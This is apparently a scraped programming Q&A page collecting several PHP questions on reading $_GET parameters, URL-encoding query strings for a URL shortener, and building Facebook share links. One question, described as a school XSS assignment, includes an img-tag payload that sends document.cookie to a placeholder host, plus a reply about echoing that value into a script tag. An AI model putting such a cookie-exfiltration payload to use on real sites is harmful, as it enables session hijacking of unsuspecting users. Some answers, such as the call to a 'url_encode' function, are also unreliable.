We Keep Coding

Unable to set and get $_GET in cakephp2

I want to have a following condition in my view.ctp. I want to get the parameters like "/?parameters=name&data=1" from a url and have it in my view. I want to set a $_GET. Where can I set it? Controller,Element,lor View? I read multiple tutorials but I still dont get how the $_GET works in Cakephp2. It would be great if you can give me sample or hints for dummies like me.
if(!empty($_GET['parameter'])){
}

$_GET['parameter'] should be $_GET['parameters'] in your code. For your /?parameters=name&data=1

PHP Variables not passing to url correctly from API

I'm trying to use the Premium URL Shortener script from codecanyon, I have asked for support but they seem to be a little busy, so the response time is not to quick.
The issue I have is when the API sends the request to the url shortener script with the following shortened query for example purposes:
$short = "http://myurl/api?api=MYAPI&format=text&url=http://myfullwebsite.com/email/quote.php?fullname=$fullname&address=$address&emailaddress=$emailaddress";
Although the variables are being placed in the script correctly using echo function at the end of the script after the api request is sent shows they are correctly inserted like so:
http://myurl/api?api=MYAPI&format=text&url=http://myfullwebsite.com/email/quote.php?fullname=Dan Smith&address=12 Main Street, London&emailaddress=dan#smith.com
However if I click the shortened url provided to me from the script I only get the following url string appear in the browser:
http://myfullwebsite.com/email/quote.php?fullname=Dan
It seems as soon as there is a space or even if there is no second name such as Dan Smith and only Dan is the available name, it will not even apply the second ampersand or & sign.
I have tried to use urlecode() but still no joy and I've been pulling my hair out for the last 3 days!
As a novice beginner it has been somewhat difficult to try and achieve the end result and it seems unreachable so I would appreciate any kind help or advice if possible, Maybe I'm missing something so simple?
I've thought of having the url query build from an array of variables but as a novice I've tried one way and failed so not sure if I have done it wrong.
Here is my full api code where I have tried both with SESSION and GET but that is not the problem as the end result echos to the browser with the variables there.. it's only when you follow the shortened url link that you see they're missing.
<?php
session_start();
$fullname = htmlspecialchars($_GET["fullname"]);
$address = htmlspecialchars($_GET["address"]);
$postcode = htmlspecialchars($_GET["postcode"]);
$emailaddress = htmlspecialchars($_GET["emailaddress"]);
$short = "http://myurl/api?api=MYAPI&format=text&url=http://ukhomesurveys.co.uk/email/quote.php?fullname=$fullname&address=$address&emailaddress=$emailaddress";
echo $short;
// Using Plain Text Response
$api_url = $short;
$res= #file_get_contents($api_url);
if($res){
echo $res;
}
?>
Hope I covered everything and hope I have not confused anyone. Thanks.

I think the good choice here is to encode your query with base64 and then pass it to the shortener. In your http://myfullwebsite.com/email/quote.php you just decode the query and use it. The standart PHP functions are base64_encode and base64_decode.

Did you try to encode URI using rawurlencode?
$url = rawurlencode('http://myfullwebsite.com/email/quote.php?fullname=Dan Smith&address=12 Main Street, London&emailaddress=dan#smith.com');

Pass $.variable in url

I would like to pass a variable as a value to a website. (Doing a school assignment on XSS)
For example I currently have:
$.cookie('echat') and $.cookie('PHPSESSID')
I would like to pass it into a link say:
xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')
However, nothing is pass to xxxx.com/xxx.php
Any1 know the syntax to do this?
specifically i am placing a img tag like this to exploit:
&lt img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie&gt
Apparently, document.cookie is not working and I need $.cookie('PHPSESSID') to get the PHPID

Your URL is setting the value of $_GET['cookie'] to $.cookie('PHPSESSID') in your PHP script, nothing more. How that's handled is up to PHP.
Since that looks like JavaScript (specifically, the jQuery Cookie plugin), you could conceivably do echo "<script>{$_GET['cookie']}</script>"; in your PHP to spit it out as JS on the resulting page. As you hopefully know from your classes, blindly using user-submitted data like this is dangerous and a bad idea.

use this php function
url_encode("string")
such as
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>

Simple $_GET question

Hey, i am currently creating a pagination script using php and jquery and for some reason can't display the $_GET that im trying to grab.
There is no form, but looking at the firebug console I get a url like this:
pagination.php?id=category
Just wondering how I can get that 'category' and just echo it out.

doesn't $_GET['id'] do it?

Try:
echo $_GET['id'];
Just in case that "category" is a URL, try to encode it, otherwise it will not populate correctly; and finally, don't use variables over 100 characters in length.

echo $_GET['id'];
also, be sure to sanitize user input before doing anything with it.

How to pass part of url in new link? Using only HTML & PHP

I have been trying to attempt to use the facebook share function in my website but i cant seems to have the right result.
Say:
i have a page called http://www.example.com/product.php?prod=lpd026n&cat=43
and i am using facebook's share function to have visitors to share the page in the FB wall.
i tried writing the link this way but i doesn't seems to be successful:
href="http://www.facebook.com/share.php?u=www.example.com/proddetail.php?<?php print urlencode(#$_SERVER['QUERY_STRING']!=''?'?'.$_SERVER['QUERY_STRING']:'')?>"
as the result the arguments in the URL came out to be in %26, %3D and etc..
Ie: example.com/proddetail.php?prod%3Dlpd026n%26cat%3D43
as some of you may know that the data after '?' is dynamic and i am planing to use the code above in the frame of the page, so it will have different query passed to the share link in every new item.
The end result that i want got to look like this:
http://www.facebook.com/sharer.php?u=http://www.example.com/proddetail.php?prod=lpd026n&cat=43
Not
http://www.facebook.com/share.php?u=http://www.example.com/proddetail.php?prod%3Dlpd026n%26cat%3D43
can anyone help me to solve this problem?
Thanks in advance!
Ps: if you are unclear, please ask me to further clarify.

This URL:
http://www.facebook.com/share.php?u=http://www.example.com/proddetail.php?prod%3Dlpd026n%26cat%3D43
is only partially-encoded. You actually need to fully URL-encode it before passing to FB, so that it won't interfere with FB's URL structure. I'm sure that their script will know how to parse it properly.
The correct method is:
$url = 'http://www.facebook.com/sharer.php?u='.urlencode('http://www.example.com/proddetail.php?prod=lpd026n&cat=43');
// evaluates to:
// http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.example.com%2Fproddetail.php%3Fprod%3Dlpd026n%26cat%3D43
Update: build your dynamic query
// Original URL
$url = 'http://www.example.com/proddetail.php';
if ($_SERVER['QUERY_STRING'])
$url .= '?'.$_SERVER['QUERY_STRING'];
// Final URL for FB
$fb_url = 'http://www.facebook.com/share.php?u='.urlencode($url);

This is what urlencode does, what is the problem with the link this way?
Edit: I do not use PHP, but I think the following will do the trick (omitted the urlencode):
href="http://www.facebook.com/share.php?u=www.example.com/proddetail.php?<?php print $_SERVER['QUERY_STRING']?>"

I guess K Prime is right.
u need to encode the whole url because the slashes and ":" are still causing problems in this link ;)
$url = 'http://www.facebook.com/sharer.php?u='.urlencode('http://www.example.com/proddetail.php?prod=lpd026n&cat=43');
should be fine for your purposes.